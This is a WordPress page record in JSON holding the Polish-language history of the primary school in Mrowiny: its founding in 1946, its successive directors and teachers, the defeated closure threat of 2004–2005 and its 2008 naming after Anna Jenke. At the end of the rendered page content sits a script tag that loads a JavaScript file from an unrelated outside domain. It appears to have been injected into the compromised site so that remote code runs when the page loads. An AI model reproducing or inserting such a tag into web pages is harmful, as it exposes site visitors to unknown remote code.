{"id":12,"date":"2015-12-15T13:19:40","date_gmt":"2015-12-15T12:19:40","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=12"},"modified":"2020-04-23T09:21:42","modified_gmt":"2020-04-23T07:21:42","slug":"historia","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/historia\/","title":{"rendered":"Historia"},"content":{"rendered":"<p style=\"text-align: justify;\">\u00a0<img loading=\"lazy\" class=\"size-medium wp-image-422 alignleft\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/stara-szkola-300x239.jpg\" alt=\"stara szkola\" width=\"300\" height=\"239\" srcset=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/stara-szkola-300x239.jpg 300w, http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/stara-szkola-768x612.jpg 768w, http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/stara-szkola-1024x816.jpg 1024w, http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/stara-szkola.jpg 1500w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>Historia Tej szko\u0142y nie zosta\u0142a przez nikogo spisana. Nie ma na terenie Jej pierwszych pracownik\u00f3w. Z opowiada\u0144 by\u0142ych uczni\u00f3w, dzi\u015b zaawansowanych wiekiem mieszka\u0144c\u00f3w Mrowin i \u017barowa wynika, \u017ce zosta\u0142a zorganizowana w 1946 r. Jednym z pierwszych Jej nauczycieli i kierownik\u00f3w by\u0142 Pan <strong>De\u0142hy. <\/strong>Mieszka\u0144cy pami\u0119taj\u0105 Go jako pierwszego kierownika. Potem kolejno funkcje te pe\u0142nili: <strong>Roman Waczk\u00f3w, Mieczys\u0142aw Skarbek, Helena Chweyka, Romuald Worsa, Edmund Waczk\u00f3w, Edmund Smagie\u0142, Jan Kalina, Zdzis\u0142aw Ko\u0142acz.<\/strong> Pierwsi nauczyciele: <strong>Wanda \u0141\u0105tkowska, Maria Matuszkiewicz, Jan Statuch, Marek Zi\u0119tek, Eugeniusz Iwan, J\u00f3zef Mase\u0142ko.<\/strong><\/p>\n<p style=\"text-align: justify;\">\u00a0\u00a0 \u00a0\u00a0 W pierwszych latach po wojnie by\u0142a to szko\u0142a rozwojowa, najpierw niepe\u0142na, potem siedmioklasowa. W kadencji Pana <strong>Jana Kaliny<\/strong> by\u0142a ju\u017c szko\u0142\u0105 o\u015bmioklasow\u0105, a uczy\u0142o si\u0119 w niej ponad 330 uczni\u00f3w, w dw\u00f3ch budynkach szkolnych. Od 1974 r \u00f3wczesny kierownik szko\u0142y <strong>Zdzis\u0142aw Ko\u0142acz <\/strong>dokona\u0142 reorganizacji przenosz\u0105c starsze oddzia\u0142y do \u017barowa. W wyniku tych zmian w Mrowinach funkcjonowa\u0142y 3 oddzia\u0142y ( kl. I- III) i ognisko przedszkolne. Powsta\u0142a w ten spos\u00f3b Filia Szko\u0142y Podstawowej nr 3 w \u017barowie. Kolejnymi kierownikami Filii by\u0142y: <strong>Danuta Kalina, Helena Konieczna, Maria Paryjczuk.<\/strong><\/p>\n<p style=\"text-align: justify;\">\u00a0\u00a0\u00a0 Decyzja o obni\u017ceniu stopnia organizacji szko\u0142y mia\u0142a, zdaniem Pana Jana Kaliny, jak i mieszka\u0144c\u00f3w Mrowin negatywne skutki. Upad\u0142 w\u00f3wczas czynnik kulturotw\u00f3rczy jakim by\u0142y: pe\u0142na o\u015bmioklasowa szko\u0142a, liczna rada pedagogiczna i pr\u0119\u017cny pod\u00f3wczas komitet rodzicielski. Rozwija\u0142o si\u0119 \u017cycie sportowe, ko\u0142a zainteresowa\u0144, nauczyciele zasilali aktyw spo\u0142eczny wsi.<\/p>\n<p style=\"text-align: justify;\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 W po\u0142owie lat 80-tych by\u0142o to w zaniku, a dzieci z Mrowin by\u0142y tymi doje\u017cd\u017caj\u0105cymi autobusami PKS (nie by\u0142o wtedy mowy o szkolnym autobusie), a cz\u0119\u015bciej dochodz\u0105cymi do \u017barowa. Dzieci nie mia\u0142y poczucia \u201e<strong>w\u0142asnej szko\u0142y\u201d, <\/strong>by\u0142y bowiem przyjmowani raz do SP nr 3, raz do SP nr 1, towarzyszy\u0142y im odczucia uczni\u00f3w \u201e drugiej kategorii\u201d. Mimo nielicznych grup dzieci by\u0142y rozdzielane do r\u00f3wnoleg\u0142ych klas \u201ea\u201d lub \u201e b\u201d.<\/p>\n<p style=\"text-align: justify;\">Prze\u0142om nast\u0119puje w latach 90-tych, kiedy funkcj\u0119 dyrektora szko\u0142y obj\u0119\u0142a <strong>Pani Helena S\u0142owik<\/strong> ( z d. Miluniec)-absolwentka szko\u0142y i mieszkanka Mrowin.<\/p>\n<p style=\"text-align: justify;\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Ogromnym zaanga\u017cowaniem w sprawy wsi, gminy, a szczeg\u00f3lnie szko\u0142y, z du\u017c\u0105 pomoc\u0105 rodzic\u00f3w dzieci ucz\u0119szczaj\u0105cych do szko\u0142y, a tak\u017ce dzi\u0119ki przychylnemu nastawieniu Zarz\u0105dowi Gminy \u017bar\u00f3w Pani S\u0142owik zacz\u0119\u0142a podnosi\u0107 poziom organizacyjny plac\u00f3wki. I tak , w 1996 r. utworzono klas\u0119 IV, a nast\u0119pnie w kolejnych latach 1997-1998 utworzono klas\u0119 pi\u0105t\u0105 i sz\u00f3st\u0105. By\u0142o to mo\u017cliwe dzi\u0119ki zaadoptowaniu pomieszcze\u0144 strychu na dwie dodatkowe klasy, wybudowaniu sanitariat\u00f3w w budynku szko\u0142y i zaadoptowaniu sali PGR\u00a0 na salk\u0119 gimnastyczn\u0105. Uda\u0142o si\u0119 to wykona\u0107 dzi\u0119ki funduszom z bud\u017cetu Gminy \u017bar\u00f3w, a tak\u017ce pracy spo\u0142ecznej tutejszych mieszka\u0144c\u00f3w.<\/p>\n<p style=\"text-align: justify;\"><em>\u00a0\u00a0\u00a0<\/em> W wyniku reformy o\u015bwiaty w Polsce, pod koniec lat 90-tych zaczynaj\u0105 funkcjonowa\u0107 6-klasowe szko\u0142y podstawowe i 3 letnie gimnazja. Od 1999 r szko\u0142a w Mrowinach staje si\u0119 ponownie pe\u0142n\u0105 podstaw\u00f3wk\u0105, w kt\u00f3rej funkcjonuje oddzia\u0142 przedszkolny, i 6 oddzia\u0142\u00f3w klasowych. W\u00f3wczas dyrektorem zostaje <strong>Roman Konieczny<\/strong> \u2013 absolwent szko\u0142y i mieszkaniec Mrowin. Kadencj\u0119 pe\u0142ni w latach 1998-2004.<\/p>\n<p style=\"text-align: justify;\">W pe\u0142nej podstaw\u00f3wce pracuj\u0105 w\u00f3wczas: <strong>Ma\u0142gorzata Zi\u0119ba, Edyta Cichecka, Ma\u0142gorzta Kownacka, Renata Frycz, Iwona Ma\u0107ka\u0142a, Katarzyna Buczma, Monika Jag\u0142a, Katarzyna Chodyniecka, Jolanta Papi\u0144ska, El\u017cbieta Suchorabska i Roman Konieczny.<\/strong><\/p>\n<p style=\"text-align: justify;\"><em>\u00a0\u00a0\u00a0 <\/em>Kolejnym dyrektorem zostaje <strong>Pani Monika Jag\u0142a,<\/strong> kt\u00f3ra sprawuje kadencj\u0119 w latach 2004- 2010. W latach 2004- 2005 pojawia si\u0119 widmo likwidacji szko\u0142y ze wzgl\u0119du na ma\u0142\u0105 liczb\u0119 uczni\u00f3w. Odby\u0142o si\u0119 w tej sprawie wiele spotka\u0144 z mieszka\u0144cami wsi, nauczycielami i przede wszystkim z organem prowadz\u0105cym szko\u0142\u0119 \u2013 Gmin\u0105 \u017bar\u00f3w. Stanowisko burmistrza piastowa\u0142a w\u00f3wczas <strong>Pani Lilla Gruntkowska.<\/strong><\/p>\n<p style=\"text-align: justify;\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Merytoryczne i rzeczowe dyskusje wszystkich zainteresowanych podmiot\u00f3w doprowadzi\u0142y do obronienia szko\u0142y. Szczeg\u00f3lnie mocno w obron\u0119 szko\u0142y w\u0142\u0105czyli si\u0119 rodzice z przewodnicz\u0105c\u0105 Rady Rodzic\u00f3w <strong>Pani\u0105 Danut\u0105 Borowsk\u0105<\/strong> na czele. Rodzice argumentowali min., \u017ce Mrowiny s\u0105 wsi\u0105 rozwojow\u0105, ludzie zaczynaj\u0105 budowa\u0107 domy, powstaj\u0105 w pobliskiej strefie ekonomicznej nowe zak\u0142ady pracy, szko\u0142a ma dobre wyniki, jest przyjazna i bezpieczna dla uczni\u00f3w, wreszcie jest swoistym, wiejskim domem kultury. Szko\u0142a pozosta\u0142a.<\/p>\n<p style=\"text-align: justify;\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 W czerwcu 2008 r. odby\u0142o si\u0119 uroczyste <strong>nadanie szkole imienia . Patronk\u0105 zosta\u0142a Anna Jenke <\/strong>\u2013 wspania\u0142y pedagog i wychowawca. Szko\u0142a otrzyma\u0142a sztandar, a s\u0142owa hymnu napisa\u0142a absolwentka szko\u0142y <strong>Maria Borowska.<\/strong><\/p>\n<p style=\"text-align: justify;\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Po zako\u0144czeniu kadencji przez <strong>Pani\u0105 Monik\u0119 Jag\u0142\u0119<\/strong> nowym dyrektorem szko\u0142y zosta\u0142a <strong>Pani Beata Jankiewicz.<\/strong> Pe\u0142ni\u0142a t\u0119 funkcj\u0119 tylko 2 miesi\u0105ce- VII-VIII 2010 r., a nast\u0119pnie przesz\u0142a do pracy w Kuratorium O\u015bwiaty we Wroc\u0142awiu jako wizytator.<\/p>\n<p style=\"text-align: justify;\"><em>\u00a0\u00a0\u00a0 <\/em>Rok 2010 wprowadza do plac\u00f3wki kolejnego dyrektora, kt\u00f3rym ponownie zostaje <strong>Roman Konieczny<\/strong>, najpierw jako pe\u0142ni\u0105cy obowi\u0105zki, a nast\u0119pnie w wyniku post\u0119powania konkursowego jako <strong>dyrektor szko\u0142y.<\/strong> Kadencj\u0119 rozpocz\u0105\u0142 14 pa\u017adziernika 2010 r, kt\u00f3ra trwa do dzisiaj.<\/p>\n<p style=\"text-align: justify;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 W kwietniu 2013 r. szko\u0142a w Mrowinach obchodzi\u0142a V rocznic\u0119 nadania szkole imienia. Na uroczysto\u015b\u0107 przyby\u0142o wielu znakomitych go\u015bci, min. Biskup \u015awidnicki <strong>Ignacy Dec,<\/strong> Burmistrz Miasta \u017barowa \u2013 <strong>Leszek Michalak<\/strong>, Sekretarz Gminy \u2013 <strong>Sylwia Pawlik,<\/strong> Ks. Proboszcz Parafii pw. Matki Bo\u017cej Kr\u00f3lowej Polski w Mrowinach \u2013 <strong>Pawe\u0142 Szajner, <\/strong>radni Rady Miejskiej w \u017barowie, dyrektorzy gminnych szk\u00f3\u0142, kierownicy jednostek samorz\u0105dowych, mieszka\u0144cy Mrowin, uczniowie i nauczyciele.<\/p>\n<hr \/>\n<p>&nbsp;<\/p>\n<p>Histori\u0119 spisa\u0142 <strong>Roman Konieczny<\/strong> \u2013 dyrektor szko\u0142y<\/p>\n<p>(1.06.2013 r.)<\/p>\n<p style=\"text-align: justify;\">Prosz\u0119 <strong>kolejnych dyrektor\u00f3w szko\u0142y<\/strong> o spisywanie najwa\u017cniejszych informacji o szkole, jest ona bowiem cz\u0105stk\u0105 ka\u017cdego ko\u0144cz\u0105cego t\u0119 szko\u0142\u0119 <strong>absolwenta<\/strong> \u2013 to przecie\u017c tu zdobywali swoje pierwsze umiej\u0119tno\u015bci, tu uczyli si\u0119 czyta\u0107 i pisa\u0107, zdobywa\u0107 wiedz\u0119 i do\u015bwiadczenie potrzebne na wy\u017cszych etapach edukacyjnych. Dzisiaj wielu z nich piastuje wysokie stanowiska, ma wspania\u0142\u0105 prac\u0119 i godnie reprezentuje tutejsz\u0105 plac\u00f3wk\u0119.<\/p>\n<h3 style=\"text-align: justify;\"><span style=\"color: #800000;\">O szkole i naszej wsi &#8230;<\/span><\/h3>\n<h3 style=\"text-align: justify;\"><span style=\"color: #0000ff;\">Czytaj wi\u0119cej na:<\/span><span style=\"color: #ff6600;\"> http:\/\/www.izba.centrum.zarow.pl\/mrowiny-historia<\/span><\/h3>\n<p><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00a0Historia Tej szko\u0142y nie zosta\u0142a przez nikogo spisana. Nie ma na terenie Jej pierwszych pracownik\u00f3w. Z opowiada\u0144 by\u0142ych uczni\u00f3w, dzi\u015b zaawansowanych wiekiem mieszka\u0144c\u00f3w Mrowin i \u017barowa wynika, \u017ce zosta\u0142a zorganizowana w 1946 r. Jednym z pierwszych Jej nauczycieli i kierownik\u00f3w by\u0142 Pan De\u0142hy. Mieszka\u0144cy pami\u0119taj\u0105 Go jako pierwszego kierownika. Potem kolejno funkcje te pe\u0142nili: Roman [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=12"}],"version-history":[{"count":11,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12\/revisions"}],"predecessor-version":[{"id":15059,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12\/revisions\/15059"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=12"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}